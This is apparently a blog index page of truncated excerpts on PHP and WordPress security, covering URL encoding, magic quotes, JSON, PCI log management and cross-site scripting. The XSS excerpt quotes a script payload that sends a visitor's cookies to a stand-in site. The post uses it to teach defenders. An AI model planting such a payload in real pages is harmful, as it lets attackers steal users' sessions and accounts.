Are you getting blank pages on Wordpress without any error displaying on web browser? I got this error when I have deactivated the W3 Total Cache and with that removed subdomain used as cdn. Therefore, I have shifted all the media files to normal upload directly. In the process I… READ MORE

Very less number of posts has been written for wordpress security. I was looking for making my wordpress installation more secure and found very little for Wordpress security compared to other stuff on net.
I have tried “AskApache Password Protect” few days back, but it failed for some reason. I… READ MORE

Why url encoding needed?
All NON-ASCII characters need to be converted to %xx value for a url.
Spaces and special characters can break the url.
Something like “encoding_test.php?q=hello world” need to converted into “firstpage.php?q=hello%20world”.
Most modern browser do this job most of the time. So, we do not face much… READ MORE

Management of Logs generated by various applications – Servers, Firewall and many others network application are important for large organizations. For becoming PCI complaints, it is one of the essential requirements.
PCI DSS (Payment Card Industry Data Security Standards), a standards from the PCI security council, requires all log to… READ MORE

JSON is in use for data interchange format. It is accepted in many programming language whether client side or server side language. So, learning JSON and using it securely is needed.
Both JavaScript and PHP has in-built functions for this.
JSON parser function is useful if your JSON text is… READ MORE

Reading this post first may be helpful!
Remove default PHP escaping and apply your own at runtime. This way you are safe at client’s setting of magic quote in their php.ini.
PHP has default escaping functionality. It escapes all incoming data.
It is preferred not to use default magic quote… READ MORE

Cross-Site scripting is one of the best know attack. Any web application that displays input is at risk. In this Web 2.0 time this attack can be easy to do.
Suppose a user has entered this data in input in form:

Hi, I am cool.
<script>
document.location = ‘http://coolsite.com/stolen_cookie.php?cookies=’ +… READ MORE

“Essential PHP Security” is an essential book for experienced PHP programmer. It discusses essential security measures you can take for making your PHP applications secure. Even if there are another team for your high profile web site’s security then also it is very useful. You will learn about many php.ini… READ MORE

Web 2.0 is enriching browsing experience and providing many kind packages in the form of Blog, Social networking sites and other content sharing sites. With lots of facility provided in Web 2.0 sites, there are lots of securities issues as well.

Check this good discussion on web 2.0 security issues.… READ MORE